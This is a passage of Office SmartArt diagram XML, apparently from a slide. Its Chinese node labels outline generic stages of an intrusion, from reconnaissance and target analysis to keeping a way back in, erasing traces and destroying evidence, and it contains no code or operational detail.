      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CC3B9718-0DF8-48B3-9D7F-BE5AF01E88CA}" type="sibTrans" cxnId="{D757D812-0D61-4B80-AC5F-490B6FFB864F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8F03FEE5-C855-4653-B976-5D13F5D98209}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>方便再来</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02E0989F-838F-4028-A552-B02E1AAF25D1}" type="parTrans" cxnId="{9111F14F-EC23-4145-82C1-BE1F94ABDDFE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F9B2F2F4-6A8A-4289-97F5-AF60F835CEF9}" type="sibTrans" cxnId="{9111F14F-EC23-4145-82C1-BE1F94ABDDFE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CD69FDD1-740D-4088-BD9E-2CD9264148F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>抹去痕迹</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1FDF98A6-9ACE-41C3-BD39-4E06EECFB688}" type="parTrans" cxnId="{EC8459A9-BA98-4A0A-B56F-4227F803D69A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C635D226-19CE-4BD4-9832-61DF0F9907DF}" type="sibTrans" cxnId="{EC8459A9-BA98-4A0A-B56F-4227F803D69A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C924B6FF-0707-471A-AF20-942657BACE11}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>消灭犯罪证据</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1C575ED6-897F-4907-8FDF-6783B239F51B}" type="parTrans" cxnId="{31685F1A-2203-4F69-89B5-C5217F601269}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5572F623-A864-4F54-A7D9-6C627F3AFD7A}" type="sibTrans" cxnId="{31685F1A-2203-4F69-89B5-C5217F601269}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5CA9461A-4BD5-4197-9A13-DA80E12E6AAC}" type="pres">
      <dgm:prSet presAssocID="{DE0A42EA-D98F-46F3-860B-F5810F25F6EA}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E21C27E3-B126-4E6C-9F57-B29C4230AC39}" type="pres">
      <dgm:prSet presAssocID="{CCEE0B10-FC55-4785-B098-A038F40F3F6F}" presName="horFlow" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A6B71CE8-5198-421B-84BD-1D9102C5ADEC}" type="pres">
      <dgm:prSet presAssocID="{CCEE0B10-FC55-4785-B098-A038F40F3F6F}" presName="bigChev" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{486A7887-C8CA-4E66-B96C-9410B98C3DA6}" type="pres">
      <dgm:prSet presAssocID="{0B9E3866-7D30-4197-9457-8E1549A7434D}" presName="parTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A83D3B60-C7BE-491C-9720-07817B029B4E}" type="pres">
      <dgm:prSet presAssocID="{BFC8DBD0-E389-4CAE-BD1C-D215B0FF98E9}" presName="node" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{317AF109-DDDD-4EA4-BA1C-5B94E4B3EEF5}" type="pres">
      <dgm:prSet presAssocID="{CCEE0B10-FC55-4785-B098-A038F40F3F6F}" presName="vSp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{52498437-B727-4E2D-85F9-FD15A574BF44}" type="pres">
      <dgm:prSet presAssocID="{E46B077F-3CB1-4FF3-8995-AB1F1E7C0F98}" presName="horFlow" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{305223FD-0CBC-4969-B72C-6ABDCCAD7C8B}" type="pres">
      <dgm:prSet presAssocID="{E46B077F-3CB1-4FF3-8995-AB1F1E7C0F98}" presName="bigChev" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{44036B05-3EE9-46A8-925C-69821DB30515}" type="pres">
      <dgm:prSet presAssocID="{932F3E29-8C43-42DA-94FE-B91FC5FEE52E}" presName="parTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7C8D1023-F37B-4AC2-B917-839BC525A8C2}" type="pres">
      <dgm:prSet presAssocID="{A4FBC933-FF8A-4E91-8BAE-5567988104E8}" presName="node" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{65481A18-5CEB-4333-AE08-179EBEF6E803}" type="pres">
      <dgm:prSet presAssocID="{E46B077F-3CB1-4FF3-8995-AB1F1E7C0F98}" presName="vSp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E55E4A69-0B6E-480D-978A-8B8677B437FC}" type="pres">
      <dgm:prSet presAssocID="{0FE2E818-1E6C-4E18-8455-A9655112D269}" presName="horFlow" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{45FD3591-EA83-451B-81BA-F875FC75574F}" type="pres">
      <dgm:prSet presAssocID="{0FE2E818-1E6C-4E18-8455-A9655112D269}" presName="bigChev" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DD848180-C555-4D5B-B1F3-417D15510D8C}" type="pres">
      <dgm:prSet presAssocID="{07D654DD-E41F-4841-8530-C07941994424}" presName="parTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7F2B8B70-7CBA-4C33-95C4-F5F7BEA7BEDA}" type="pres">
      <dgm:prSet presAssocID="{FCFDB795-AD88-4633-8225-CDCE872FBDFF}" presName="node" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0AFD635C-859C-4F14-AD18-7D90C25817E6}" type="pres">
      <dgm:prSet presAssocID="{0FE2E818-1E6C-4E18-8455-A9655112D269}" presName="vSp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A9804ACA-F65C-412D-9E17-269F9F1A17D6}" type="pres">
      <dgm:prSet presAssocID="{78A01CA8-D28C-4FA6-A39F-F337AEBBFA13}" presName="horFlow" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{464553F1-F566-41B4-A4E2-D4F3F66EE5C7}" type="pres">
      <dgm:prSet presAssocID="{78A01CA8-D28C-4FA6-A39F-F337AEBBFA13}" presName="bigChev" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C9D0FFBD-01FE-4FEC-ACB8-DA064CEA7389}" type="pres">
      <dgm:prSet presAssocID="{02E0989F-838F-4028-A552-B02E1AAF25D1}" presName="parTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6993B75D-8261-4653-8236-9368EAEAA5DA}" type="pres">
      <dgm:prSet presAssocID="{8F03FEE5-C855-4653-B976-5D13F5D98209}" presName="node" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{871C1264-47BD-4427-B54A-62BC66605510}" type="pres">
      <dgm:prSet presAssocID="{78A01CA8-D28C-4FA6-A39F-F337AEBBFA13}" presName="vSp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BB729C76-0D0E-478F-B9F4-1A85A2D30A94}" type="pres">
      <dgm:prSet presAssocID="{CD69FDD1-740D-4088-BD9E-2CD9264148F3}" presName="horFlow" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B16094DE-C0F7-4F59-B269-D0E461B92465}" type="pres">
      <dgm:prSet presAssocID="{CD69FDD1-740D-4088-BD9E-2CD9264148F3}" presName="bigChev" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7DD21ACB-D9DF-4B87-B10A-E05C965C58EB}" type="pres">
      <dgm:prSet presAssocID="{1C575ED6-897F-4907-8FDF-6783B239F51B}" presName="parTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E82D0B69-E2C1-4072-A113-41485980D2F2}" type="pres">
      <dgm:prSet presAssocID="{C924B6FF-0707-471A-AF20-942657BACE11}" presName="node" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{B8CB4C01-DAB2-4BF9-A096-4EFDF4EF5F37}" srcId="{DE0A42EA-D98F-46F3-860B-F5810F25F6EA}" destId="{CCEE0B10-FC55-4785-B098-A038F40F3F6F}" srcOrd="0" destOrd="0" parTransId="{A9310A6E-51DC-413D-9314-48F634F1ED21}" sibTransId="{494A2B7C-066F-426B-BA60-760916A692AB}"/>
    <dgm:cxn modelId="{76B30D06-C0CE-4F68-8971-74072B6F363A}" srcId="{E46B077F-3CB1-4FF3-8995-AB1F1E7C0F98}" destId="{A4FBC933-FF8A-4E91-8BAE-5567988104E8}" srcOrd="0" destOrd="0" parTransId="{932F3E29-8C43-42DA-94FE-B91FC5FEE52E}" sibTransId="{720EC36D-8E6E-4791-8A2A-C7F3BACB611A}"/>
    <dgm:cxn modelId="{0A5E2207-3499-4FF9-B13D-CA93A5222CA8}" type="presOf" srcId="{CD69FDD1-740D-4088-BD9E-2CD9264148F3}" destId="{B16094DE-C0F7-4F59-B269-D0E461B92465}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{EF9F910E-D185-4BAA-9858-A676255BAC6E}" type="presOf" srcId="{A4FBC933-FF8A-4E91-8BAE-5567988104E8}" destId="{7C8D1023-F37B-4AC2-B917-839BC525A8C2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{D757D812-0D61-4B80-AC5F-490B6FFB864F}" srcId="{DE0A42EA-D98F-46F3-860B-F5810F25F6EA}" destId="{78A01CA8-D28C-4FA6-A39F-F337AEBBFA13}" srcOrd="3" destOrd="0" parTransId="{79F7AB02-6D12-4C90-B899-C687A6478D3A}" sibTransId="{CC3B9718-0DF8-48B3-9D7F-BE5AF01E88CA}"/>
    <dgm:cxn modelId="{31685F1A-2203-4F69-89B5-C5217F601269}" srcId="{CD69FDD1-740D-4088-BD9E-2CD9264148F3}" destId="{C924B6FF-0707-471A-AF20-942657BACE11}" srcOrd="0" destOrd="0" parTransId="{1C575ED6-897F-4907-8FDF-6783B239F51B}" sibTransId="{5572F623-A864-4F54-A7D9-6C627F3AFD7A}"/>
    <dgm:cxn modelId="{45557D23-FE19-496F-9F8A-8097C9096F62}" type="presOf" srcId="{8F03FEE5-C855-4653-B976-5D13F5D98209}" destId="{6993B75D-8261-4653-8236-9368EAEAA5DA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{CD04FB2B-1190-40A8-897F-61B57C4BEDFD}" type="presOf" srcId="{78A01CA8-D28C-4FA6-A39F-F337AEBBFA13}" destId="{464553F1-F566-41B4-A4E2-D4F3F66EE5C7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{16A7254C-6E90-4EE4-BE4B-3399DE085C18}" srcId="{0FE2E818-1E6C-4E18-8455-A9655112D269}" destId="{FCFDB795-AD88-4633-8225-CDCE872FBDFF}" srcOrd="0" destOrd="0" parTransId="{07D654DD-E41F-4841-8530-C07941994424}" sibTransId="{7AF5F72D-D905-435D-890F-1CFE15E1908D}"/>
    <dgm:cxn modelId="{9111F14F-EC23-4145-82C1-BE1F94ABDDFE}" srcId="{78A01CA8-D28C-4FA6-A39F-F337AEBBFA13}" destId="{8F03FEE5-C855-4653-B976-5D13F5D98209}" srcOrd="0" destOrd="0" parTransId="{02E0989F-838F-4028-A552-B02E1AAF25D1}" sibTransId="{F9B2F2F4-6A8A-4289-97F5-AF60F835CEF9}"/>
    <dgm:cxn modelId="{FC758D55-F369-4A6F-ADDF-029D6605721D}" type="presOf" srcId="{DE0A42EA-D98F-46F3-860B-F5810F25F6EA}" destId="{5CA9461A-4BD5-4197-9A13-DA80E12E6AAC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{C0DAFE83-8C01-433E-AAA1-31E9034CE87F}" type="presOf" srcId="{C924B6FF-0707-471A-AF20-942657BACE11}" destId="{E82D0B69-E2C1-4072-A113-41485980D2F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{7DD9A389-35AF-432C-8594-0F1C3495B33F}" srcId="{DE0A42EA-D98F-46F3-860B-F5810F25F6EA}" destId="{E46B077F-3CB1-4FF3-8995-AB1F1E7C0F98}" srcOrd="1" destOrd="0" parTransId="{63839089-E03F-4899-9EE0-93628AD98BC7}" sibTransId="{65871CC2-5958-47D6-86BA-227E5B599BB2}"/>
    <dgm:cxn modelId="{2DA75E96-2F3D-4632-84C8-07868AE4F272}" type="presOf" srcId="{CCEE0B10-FC55-4785-B098-A038F40F3F6F}" destId="{A6B71CE8-5198-421B-84BD-1D9102C5ADEC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{50377D97-48D5-4670-8EB0-4DDC5C520771}" type="presOf" srcId="{BFC8DBD0-E389-4CAE-BD1C-D215B0FF98E9}" destId="{A83D3B60-C7BE-491C-9720-07817B029B4E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{203A3FA9-9697-4630-A7FE-FA5DC683EE0C}" type="presOf" srcId="{E46B077F-3CB1-4FF3-8995-AB1F1E7C0F98}" destId="{305223FD-0CBC-4969-B72C-6ABDCCAD7C8B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{EC8459A9-BA98-4A0A-B56F-4227F803D69A}" srcId="{DE0A42EA-D98F-46F3-860B-F5810F25F6EA}" destId="{CD69FDD1-740D-4088-BD9E-2CD9264148F3}" srcOrd="4" destOrd="0" parTransId="{1FDF98A6-9ACE-41C3-BD39-4E06EECFB688}" sibTransId="{C635D226-19CE-4BD4-9832-61DF0F9907DF}"/>
    <dgm:cxn modelId="{C5D4E3BF-C87C-4C05-9260-6368EED99F51}" srcId="{CCEE0B10-FC55-4785-B098-A038F40F3F6F}" destId="{BFC8DBD0-E389-4CAE-BD1C-D215B0FF98E9}" srcOrd="0" destOrd="0" parTransId="{0B9E3866-7D30-4197-9457-8E1549A7434D}" sibTransId="{CFC49F33-E624-4901-8BD4-D19136B37011}"/>
    <dgm:cxn modelId="{DEA4DCC7-320E-4473-9A3F-1283FBCB9638}" type="presOf" srcId="{FCFDB795-AD88-4633-8225-CDCE872FBDFF}" destId="{7F2B8B70-7CBA-4C33-95C4-F5F7BEA7BEDA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{DC3BFBC9-BCEA-4A39-8C59-712B40742BAC}" type="presOf" srcId="{0FE2E818-1E6C-4E18-8455-A9655112D269}" destId="{45FD3591-EA83-451B-81BA-F875FC75574F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{1A5EF3D5-7B6B-4F0A-BCEE-8A48526E8766}" srcId="{DE0A42EA-D98F-46F3-860B-F5810F25F6EA}" destId="{0FE2E818-1E6C-4E18-8455-A9655112D269}" srcOrd="2" destOrd="0" parTransId="{52856666-A088-4F76-B82F-6683717BF3B8}" sibTransId="{BAD0D889-F436-4012-812A-69B541F9697C}"/>
    <dgm:cxn modelId="{224CD5A4-82A1-42CF-8546-CDF9D52D255A}" type="presParOf" srcId="{5CA9461A-4BD5-4197-9A13-DA80E12E6AAC}" destId="{E21C27E3-B126-4E6C-9F57-B29C4230AC39}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{41EE4EBC-BA28-4B0C-9323-0077071E20A8}" type="presParOf" srcId="{E21C27E3-B126-4E6C-9F57-B29C4230AC39}" destId="{A6B71CE8-5198-421B-84BD-1D9102C5ADEC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{663A805D-46C6-474B-BFC2-9D60AA6BA1C2}" type="presParOf" srcId="{E21C27E3-B126-4E6C-9F57-B29C4230AC39}" destId="{486A7887-C8CA-4E66-B96C-9410B98C3DA6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{1D85B637-16CA-473D-A7B6-FB917FB130D6}" type="presParOf" srcId="{E21C27E3-B126-4E6C-9F57-B29C4230AC39}" destId="{A83D3B60-C7BE-491C-9720-07817B029B4E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{0FF170DA-CBD5-47EE-93FF-889F089012ED}" type="presParOf" srcId="{5CA9461A-4BD5-4197-9A13-DA80E12E6AAC}" destId="{317AF109-DDDD-4EA4-BA1C-5B94E4B3EEF5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{9CA77D57-C6C4-4D6C-B847-2C695C4FDF54}" type="presParOf" srcId="{5CA9461A-4BD5-4197-9A13-DA80E12E6AAC}" destId="{52498437-B727-4E2D-85F9-FD15A574BF44}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{04D53EEF-AEB0-4E40-AD79-B8142CEC7446}" type="presParOf" srcId="{52498437-B727-4E2D-85F9-FD15A574BF44}" destId="{305223FD-0CBC-4969-B72C-6ABDCCAD7C8B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{4A5641CB-7F1C-4CD4-87A7-17C16F9D4823}" type="presParOf" srcId="{52498437-B727-4E2D-85F9-FD15A574BF44}" destId="{44036B05-3EE9-46A8-925C-69821DB30515}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{FB40FFAD-B138-4982-B3CC-3A522BDC6271}" type="presParOf" srcId="{52498437-B727-4E2D-85F9-FD15A574BF44}" destId="{7C8D1023-F37B-4AC2-B917-839BC525A8C2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{A08D1A07-C819-438E-91BD-5891A9BD1E36}" type="presParOf" srcId="{5CA9461A-4BD5-4197-9A13-DA80E12E6AAC}" destId="{65481A18-5CEB-4333-AE08-179EBEF6E803}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{368F0C6D-DC79-4C2E-ADE6-770BC7712B02}" type="presParOf" srcId="{5CA9461A-4BD5-4197-9A13-DA80E12E6AAC}" destId="{E55E4A69-0B6E-480D-978A-8B8677B437FC}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{08441F41-D96D-49A9-BA88-50C7D756A8FF}" type="presParOf" srcId="{E55E4A69-0B6E-480D-978A-8B8677B437FC}" destId="{45FD3591-EA83-451B-81BA-F875FC75574F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{DC8CB731-9895-49F7-BD76-A5CB652F796A}" type="presParOf" srcId="{E55E4A69-0B6E-480D-978A-8B8677B437FC}" destId="{DD848180-C555-4D5B-B1F3-417D15510D8C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{AECDB0D6-8B7C-44DF-9BDF-B41D30AEC05F}" type="presParOf" srcId="{E55E4A69-0B6E-480D-978A-8B8677B437FC}" destId="{7F2B8B70-7CBA-4C33-95C4-F5F7BEA7BEDA}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{21FA40E1-2E69-4A81-BE76-02CCA954CC1A}" type="presParOf" srcId="{5CA9461A-4BD5-4197-9A13-DA80E12E6AAC}" destId="{0AFD635C-859C-4F14-AD18-7D90C25817E6}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{B4F18403-CB08-4349-B0C9-5923BC8D649A}" type="presParOf" srcId="{5CA9461A-4BD5-4197-9A13-DA80E12E6AAC}" destId="{A9804ACA-F65C-412D-9E17-269F9F1A17D6}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{ABF95B36-9EDC-47C4-92F7-A11BCC07ACF1}" type="presParOf" srcId="{A9804ACA-F65C-412D-9E17-269F9F1A17D6}" destId="{464553F1-F566-41B4-A4E2-D4F3F66EE5C7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{4B1A51F7-8740-4021-B71E-23FF75C6AB0C}" type="presParOf" srcId="{A9804ACA-F65C-412D-9E17-269F9F1A17D6}" destId="{C9D0FFBD-01FE-4FEC-ACB8-DA064CEA7389}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{B9043CAC-0B49-4F47-9218-BA43E37633E1}" type="presParOf" srcId="{A9804ACA-F65C-412D-9E17-269F9F1A17D6}" destId="{6993B75D-8261-4653-8236-9368EAEAA5DA}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{722CD833-E23C-4D9B-8C4D-8775235234CC}" type="presParOf" srcId="{5CA9461A-4BD5-4197-9A13-DA80E12E6AAC}" destId="{871C1264-47BD-4427-B54A-62BC66605510}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{5C4E3C55-E5B7-4B6B-81A3-01905FEFCBA3}" type="presParOf" srcId="{5CA9461A-4BD5-4197-9A13-DA80E12E6AAC}" destId="{BB729C76-0D0E-478F-B9F4-1A85A2D30A94}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{3F005C33-9557-4FED-A95E-445DA539F71E}" type="presParOf" srcId="{BB729C76-0D0E-478F-B9F4-1A85A2D30A94}" destId="{B16094DE-C0F7-4F59-B269-D0E461B92465}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{A87E6C54-41B8-4581-9E07-57795729A264}" type="presParOf" srcId="{BB729C76-0D0E-478F-B9F4-1A85A2D30A94}" destId="{7DD21ACB-D9DF-4B87-B10A-E05C965C58EB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3"/>
    <dgm:cxn modelId="{7D5A6762-BA43-4F79-BC16-F31257F34D88}" type="presParOf" srcId="{BB729C76-0D0E-478F-B9F4-1A85A2D30A94}" destId="{E82D0B69-E2C1-4072-A113-41485980D2F2}"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71CE8-5198-421B-84BD-1D9102C5ADEC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2123502" y="2172"/>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a:t>踩点</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2592043" y="2172"/>
        <a:ext cx="1405622" cy="937081"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A83D3B60-C7BE-491C-9720-07817B029B4E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4161654" y="81824"/>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确定目标</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4550543" y="81824"/>
        <a:ext cx="1166666" cy="777777"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{305223FD-0CBC-4969-B72C-6ABDCCAD7C8B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2123502" y="1070444"/>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a:t>定位</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2592043" y="1070444"/>
        <a:ext cx="1405622" cy="937081"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7C8D1023-F37B-4AC2-B917-839BC525A8C2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4161654" y="1150096"/>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分析目标</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4550543" y="1150096"/>
